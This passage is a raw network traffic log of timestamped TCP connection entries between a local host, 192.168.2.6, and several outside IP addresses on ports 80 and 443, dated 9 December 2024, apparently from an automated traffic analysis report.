                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.042845964 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.042896986 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.042968988 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.043008089 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.043895960 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.043988943 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.044024944 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.044043064 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.044778109 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.044816971 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.045005083 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.045069933 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.045902967 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.046186924 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.046236992 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.046842098 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.047111034 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.047399998 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.047478914 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.101620913 CET44349951104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.101691008 CET49951443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.103426933 CET49951443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.103431940 CET44349951104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.103698969 CET44349951104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.106544971 CET49951443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.106684923 CET49951443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.106715918 CET44349951104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.106792927 CET49951443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.106800079 CET44349951104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.169004917 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.169100046 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.169162989 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.169218063 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.169369936 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.169414997 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.169779062 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.169848919 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.170414925 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.170439959 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.170458078 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.170480013 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.171363115 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.171901941 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.189481974 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.189635992 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.189809084 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.189977884 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.190027952 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.190171003 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.190934896 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.191052914 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.191095114 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.191257954 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.191296101 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.192157030 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.192198038 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.192328930 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.192368984 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.193084002 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.193130016 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.193267107 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.193305016 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.194020987 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.194067955 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.194585085 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.194623947 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.195106030 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.195445061 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.195492029 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.196209908 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.196252108 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.196922064 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.196964025 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.197062016 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.197074890 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.197101116 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.197120905 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.198177099 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.198451042 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.198498964 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.199496031 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.199510098 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.199546099 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.200381994 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.200432062 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.200673103 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.200712919 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.201159954 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.201211929 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.201375961 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.201414108 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.202455044 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.202507019 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.202615976 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.202661991 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.203318119 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.203835011 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.203874111 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.204364061 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.204376936 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.204415083 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.205343008 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.205388069 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.205540895 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.205580950 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.206584930 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.206597090 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.206624985 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.206638098 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.207283020 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.208060980 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.208103895 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.208439112 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.208483934 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.208769083 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.208810091 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.209316969 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.209351063 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.209443092 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.209486961 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.210612059 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.210653067 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.211107969 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.211635113 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.211673975 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.212165117 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.212202072 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.212527990 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.212569952 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.212878942 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.212917089 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.213617086 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.213656902 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.213799953 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.213840008 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.214571953 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.214617968 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.214749098 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.214786053 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.215662956 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.216026068 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.216079950 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.217010975 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.217058897 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.217202902 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.217241049 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.218003988 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.218050003 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.218328953 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.218374968 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.219655037 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.219667912 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.219713926 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.220464945 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.220509052 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.220829964 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.220870018 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.221000910 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.221014023 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.221044064 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.221056938 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.221868038 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.222034931 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.222079039 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.222842932 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.222889900 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.223148108 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.223879099 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.223921061 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.224096060 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.224133968 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.225087881 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.225128889 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.225244999 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.225285053 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.225835085 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.225877047 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.225939989 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.225980043 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.226809978 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.226850033 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.227174044 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.227849007 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.227889061 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.227916002 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.227957010 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.228914022 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.228955030 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.229034901 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.229074955 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.229914904 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.229928017 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.229959011 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.230938911 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.231134892 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.231759071 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.231802940 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.232095003 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.232108116 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.232150078 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.233020067 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.233061075 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.233563900 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.234030008 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.234074116 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.234353065 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.234394073 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.235022068 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.235063076 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.235285044 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.235346079 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.236072063 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.236113071 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.236243010 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.236280918 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.237302065 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.237340927 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.237344027 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.237381935 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.240194082 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.240211010 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.240221977 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.240232944 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.240253925 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.242911100 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.361232042 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.361289024 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.361565113 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.361910105 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.361922026 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.361953020 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.361980915 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.362899065 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.363970995 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.363981009 CET8049945185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.364013910 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.364041090 CET4994580192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.416867971 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.536395073 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.536484003 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.726979017 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:44.846782923 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:45.034054041 CET44349951104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:45.034156084 CET44349951104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:45.034214020 CET49951443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:45.034657955 CET49951443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:45.034670115 CET44349951104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:45.560240030 CET49958443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:45.560266018 CET44349958104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:45.560350895 CET49958443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:45.561800957 CET49958443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:45.561814070 CET44349958104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:45.895740032 CET49960443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:45.895782948 CET44349960104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:45.895845890 CET49960443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:45.896509886 CET49960443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:45.896521091 CET44349960104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:45.904295921 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:45.904357910 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:45.916407108 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:45.916857958 CET4994480192.168.2.6185.215.113.206
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.036180019 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.392565012 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.392627954 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.398927927 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.520045996 CET804995780.82.65.70192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.774349928 CET44349958104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.774415970 CET49958443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.775562048 CET49958443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.775569916 CET44349958104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.775804996 CET44349958104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:46.825875044 CET49958443192.168.2.6104.21.48.1
